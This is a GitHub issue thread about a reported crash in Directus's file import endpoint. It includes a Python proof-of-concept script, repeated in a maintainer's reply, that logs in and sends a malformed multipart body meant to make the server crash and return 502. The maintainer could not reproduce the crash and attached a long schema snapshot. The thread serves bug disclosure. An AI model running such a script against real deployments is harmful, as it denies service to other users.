### ISSUE TITLE
File import endpoint can crash the application on certain invalid request

### ISSUE THREAD

**Issue by temptuomas** [directus/directus#12205]
### Preflight Checklist

- [X] I have completed all [Troubleshooting Steps](https://docs.directus.io/getting-started/support/#troubleshooting-steps).
- [X] I'm on [the latest version of Directus](https://github.com/directus/directus/releases).
- [X] There's [no other issue](https://github.com/directus/directus/issues?q=is%3Aissue) that already describes my problem.

### Describe the Bug

An _authenticated_ attacker can freeze the system for other users.

This affects the /utils/import endpoint. Sending an invalid input causes the whole application to crash. Service is not available for any user until it gets automatically restarted approximately 60 seconds later.

We can mitigate this issue by blocking the endpoint as it is not used actively.

### To Reproduce

anonymous_feedback collection structure:
id*: UUID,
date_created: Datetime,
page_of_origin*: String,
feedback*: Text,
language_code*: String,
was_this_content_helpful_to_you*: String
handling_state*: String,
internal_notes: Text

Python script which was run at test time and resulted in a crash:

```py
#!/usr/bin/python3
import requests
import argparse
import time

parser = argparse.ArgumentParser()
args = parser.parse_args()

s = requests.session()

url = "https://xxxxx/auth/login"
data = {
    "email":"USERNAME",
    "password":"ADD_PASSWORD_HERE",
    "mode":"cookie"
}

r = s.post(url, json=data)
access_token = r.json()["data"]["access_token"]

url = "https://xxxxxx/utils/import/anonymous_feedback"
headers = {
    "Authorization": "Bearer {access_token}".format(access_token=access_token),
    "Content-Type": "multipart/form-data; charset=utf-8; boundary=__X_BOUNDARY__"
}
data = """--__X_BOUNDARY__\r
Content-Disposition: form-data; name="file"; filename="articles.csv"\r
Content-Type: text/csv\r
\r
"feedback"\r
"hello"\r
\r
__X_BOUNDARY__"""
r = s.post(url, headers=headers, data=data)
print(r.text)
assert r.status_code == 502
```

### Errors Shown

Output from commands show Server error, There was an unexpected error in the request processing.

### What version of Directus are you using?

rc-76

### What version of Node.js are you using?

14

### What database are you using?

Postgres 11

### What browser are you using?

Chrome

### What operating system are you using?

Windows

### How are you deploying Directus?

Azure App Service Linux Container

**Comment by azrikahar** [comment]
Hi! I've tried the script you have shared, with the url & credentials being the only changes I did, but I was faced with this error preventing me from actually crashing it:

![TTquLD4f1j](https://user-images.githubusercontent.com/42867097/158779531-238af787-484b-4ba1-8aff-0b9156a3a4b0.png)

It might have been fixed by Dicer, which is a dependency of busboy, which Directus is using. It also seems like you are using a rather dated version of Directus so it can be hard for us to confirm whether this is still an existing bug, hence why we'd appreciate issues that are opened to be verified with the latest version beforehand 👍 

Would it be possible for you to test the latest version `9.6.0`? It'd also be helpful if you can point out any mistake I might have made when modifying the script, or perhaps the `anonymous_feedback` structure is not 100% the same. Feel free to [share your schema snapshot](https://docs.directus.io/reference/cli/#snapshot-the-data-model) as well! I've attached both the schema snapshot I tested (for reproducibility) and the minor-modified script I used below.

<details>
<summary>Schema snapshot for the test I did</summary>

```yaml
version: 1
directus: 9.6.0
collections:
  - collection: anonymous_feedback
    meta:
      collection: anonymous_feedback
      icon: null
      note: null
      display_template: null
      hidden: false
      singleton: false
      translations: null
      archive_field: null
      archive_app_filter: true
      archive_value: null
      unarchive_value: null
      sort_field: null
      accountability: all
      color: null
      item_duplication_fields: null
      sort: null
      group: null
      collapse: open
    schema:
      schema: public
      name: anonymous_feedback
      comment: null
  - collection: directus_translations
    schema:
      schema: public
      name: directus_translations
      comment: null
    meta: null
fields:
  - collection: anonymous_feedback
    field: id
    type: uuid
    schema:
      name: id
      table: anonymous_feedback
      schema: public
      data_type: uuid
      is_nullable: false
      generation_expression: null
      default_value: null
      is_generated: false
      max_length: null
      comment: null
      numeric_precision: null
      numeric_scale: null
      is_unique: true
      is_primary_key: true
      has_auto_increment: false
      foreign_key_schema: null
      foreign_key_table: null
      foreign_key_column: null
    meta:
      collection: anonymous_feedback
      field: id
      special:
        - uuid
      interface: input
      options: null
      display: null
      display_options: null
      readonly: true
      hidden: true
      sort: null
      width: full
      translations: null
      note: null
      conditions: null
      required: false
      group: null
  - collection: anonymous_feedback
    field: date_created
    type: timestamp
    schema:
      name: date_created
      table: anonymous_feedback
      schema: public
      data_type: timestamp with time zone
      is_nullable: true
      generation_expression: null
      default_value: null
      is_generated: false
      max_length: null
      comment: null
      numeric_precision: null
      numeric_scale: null
      is_unique: false
      is_primary_key: false
      has_auto_increment: false
      foreign_key_schema: null
      foreign_key_table: null
      foreign_key_column: null
    meta:
      collection: anonymous_feedback
      field: date_created
      special:
        - date-created
      interface: datetime
      options: null
      display: datetime
      display_options:
        relative: true
      readonly: true
      hidden: true
      sort: null
      width: half
      translations: null
      note: null
      conditions: null
      required: false
      group: null
  - collection: anonymous_feedback
    field: page_of_origin
    type: string
    schema:
      name: page_of_origin
      table: anonymous_feedback
      schema: public
      data_type: character varying
      is_nullable: true
      generation_expression: null
      default_value: null
      is_generated: false
      max_length: 255
      comment: null
      numeric_precision: null
      numeric_scale: null
      is_unique: false
      is_primary_key: false
      has_auto_increment: false
      foreign_key_schema: null
      foreign_key_table: null
      foreign_key_column: null
    meta:
      collection: anonymous_feedback
      field: page_of_origin
      special: null
      interface: input
      options: null
      display: null
      display_options: null
      readonly: false
      hidden: false
      sort: null
      width: full
      translations: null
      note: null
      conditions: null
      required: true
      group: null
  - collection: anonymous_feedback
    field: feedback
    type: text
    schema:
      name: feedback
      table: anonymous_feedback
      schema: public
      data_type: text
      is_nullable: true
      generation_expression: null
      default_value: null
      is_generated: false
      max_length: null
      comment: null
      numeric_precision: null
      numeric_scale: null
      is_unique: false
      is_primary_key: false
      has_auto_increment: false
      foreign_key_schema: null
      foreign_key_table: null
      foreign_key_column: null
    meta:
      collection: anonymous_feedback
      field: feedback
      special: null
      interface: input-multiline
      options: null
      display: null
      display_options: null
      readonly: false
      hidden: false
      sort: null
      width: full
      translations: null
      note: null
      conditions: null
      required: true
      group: null
  - collection: anonymous_feedback
    field: language_code
    type: string
    schema:
      name: language_code
      table: anonymous_feedback
      schema: public
      data_type: character varying
      is_nullable: true
      generation_expression: null
      default_value: null
      is_generated: false
      max_length: 255
      comment: null
      numeric_precision: null
      numeric_scale: null
      is_unique: false
      is_primary_key: false
      has_auto_increment: false
      foreign_key_schema: null
      foreign_key_table: null
      foreign_key_column: null
    meta:
      collection: anonymous_feedback
      field: language_code
      special: null
      interface: input
      options: null
      display: null
      display_options: null
      readonly: false
      hidden: false
      sort: null
      width: full
      translations: null
      note: null
      conditions: null
      required: true
      group: null
  - collection: anonymous_feedback
    field: was_this_content_helpful_to_you
    type: string
    schema:
      name: was_this_content_helpful_to_you
      table: anonymous_feedback
      schema: public
      data_type: character varying
      is_nullable: true
      generation_expression: null
      default_value: null
      is_generated: false
      max_length: 255
      comment: null
      numeric_precision: null
      numeric_scale: null
      is_unique: false
      is_primary_key: false
      has_auto_increment: false
      foreign_key_schema: null
      foreign_key_table: null
      foreign_key_column: null
    meta:
      collection: anonymous_feedback
      field: was_this_content_helpful_to_you
      special: null
      interface: input
      options: null
      display: null
      display_options: null
      readonly: false
      hidden: false
      sort: null
      width: full
      translations: null
      note: null
      conditions: null
      required: true
      group: null
  - collection: anonymous_feedback
    field: handling_state
    type: string
    schema:
      name: handling_state
      table: anonymous_feedback
      schema: public
      data_type: character varying
      is_nullable: true
      generation_expression: null
      default_value: null
      is_generated: false
      max_length: 255
      comment: null
      numeric_precision: null
      numeric_scale: null
      is_unique: false
      is_primary_key: false
      has_auto_increment: false
      foreign_key_schema: null
      foreign_key_table: null
      foreign_key_column: null
    meta:
      collection: anonymous_feedback
      field: handling_state
      special: null
      interface: input
      options: null
      display: null
      display_options: null
      readonly: false
      hidden: false
      sort: null
      width: full
      translations: null
      note: null
      conditions: null
      required: true
      group: null
  - collection: anonymous_feedback
    field: internal_notes
    type: text
    schema:
      name: internal_notes
      table: anonymous_feedback
      schema: public
      data_type: text
      is_nullable: true
      generation_expression: null
      default_value: null
      is_generated: false
      max_length: null
      comment: null
      numeric_precision: null
      numeric_scale: null
      is_unique: false
      is_primary_key: false
      has_auto_increment: false
      foreign_key_schema: null
      foreign_key_table: null
      foreign_key_column: null
    meta:
      collection: anonymous_feedback
      field: internal_notes
      special: null
      interface: input-multiline
      options: null
      display: null
      display_options: null
      readonly: false
      hidden: false
      sort: null
      width: full
      translations: null
      note: null
      conditions: null
      required: false
      group: null
  - collection: directus_presets
    field: icon
    type: string
    schema:
      name: icon
      table: directus_presets
      schema: public
      data_type: character varying
      is_nullable: false
      generation_expression: null
      default_value: bookmark_outline
      is_generated: false
      max_length: 30
      comment: null
      numeric_precision: null
      numeric_scale: null
      is_unique: false
      is_primary_key: false
      has_auto_increment: false
      foreign_key_schema: null
      foreign_key_table: null
      foreign_key_column: null
    meta: null
  - collection: directus_presets
    field: color
    type: string
    schema:
      name: color
      table: directus_presets
      schema: public
      data_type: character varying
      is_nullable: true
      generation_expression: null
      default_value: null
      is_generated: false
      max_length: 255
      comment: null
      numeric_precision: null
      numeric_scale: null
      is_unique: false
      is_primary_key: false
      has_auto_increment: false
      foreign_key_schema: null
      foreign_key_table: null
      foreign_key_column: null
    meta: null
  - collection: directus_settings
    field: translation_strings
    type: json
    schema:
      name: translation_strings
      table: directus_settings
      schema: public
      data_type: json
      is_nullable: true
      generation_expression: null
      default_value: null
      is_generated: false
      max_length: null
      comment: null
      numeric_precision: null
      numeric_scale: null
      is_unique: false
      is_primary_key: false
      has_auto_increment: false
      foreign_key_schema: null
      foreign_key_table: null
      foreign_key_column: null
    meta: null
  - collection: directus_translations
    field: id
    type: uuid
    schema:
      name: id
      table: directus_translations
      schema: public
      data_type: uuid
      is_nullable: false
      generation_expression: null
      default_value: null
      is_generated: false
      max_length: null
      comment: null
      numeric_precision: null
      numeric_scale: null
      is_unique: true
      is_primary_key: true
      has_auto_increment: false
      foreign_key_schema: null
      foreign_key_table: null
      foreign_key_column: null
    meta: null
  - collection: directus_translations
    field: key
    type: string
    schema:
      name: key
      table: directus_translations
      schema: public
      data_type: character varying
      is_nullable: false
      generation_expression: null
      default_value: null
      is_generated: false
      max_length: 255
      comment: null
      numeric_precision: null
      numeric_scale: null
      is_unique: false
      is_primary_key: false
      has_auto_increment: false
      foreign_key_schema: null
      foreign_key_table: null
      foreign_key_column: null
    meta: null
  - collection: directus_translations
    field: translations
    type: json
    schema:
      name: translations
      table: directus_translations
      schema: public
      data_type: json
      is_nullable: true
      generation_expression: null
      default_value: null
      is_generated: false
      max_length: null
      comment: null
      numeric_precision: null
      numeric_scale: null
      is_unique: false
      is_primary_key: false
      has_auto_increment: false
      foreign_key_schema: null
      foreign_key_table: null
      foreign_key_column: null
    meta: null
relations: []
```

</details>

<details>
<summary>The script I used for reference</summary>

```py
#!/usr/bin/python3
import requests
import argparse
import time

parser = argparse.ArgumentParser()
args = parser.parse_args()

s = requests.session()

url = "http://192.168.0.170:8055/auth/login"
data = {
    "email":"admin@example.com",
    "password":"password",
    "mode":"cookie"
}

r = s.post(url, json=data)
access_token = r.json()["data"]["access_token"]

url = "http://192.168.0.170:8055/utils/import/anonymous_feedback"
headers = {
    "Authorization": "Bearer {access_token}".format(access_token=access_token),
    "Content-Type": "multipart/form-data; charset=utf-8; boundary=__X_BOUNDARY__"
}
data = """--__X_BOUNDARY__\r
Content-Disposition: form-data; name="file"; filename="articles.csv"\r
Content-Type: text/csv\r
\r
"feedback"\r
"hello"\r
\r
__X_BOUNDARY__"""
r = s.post(url, headers=headers, data=data)
print(r.text)
assert r.status_code == 502
```

</details>
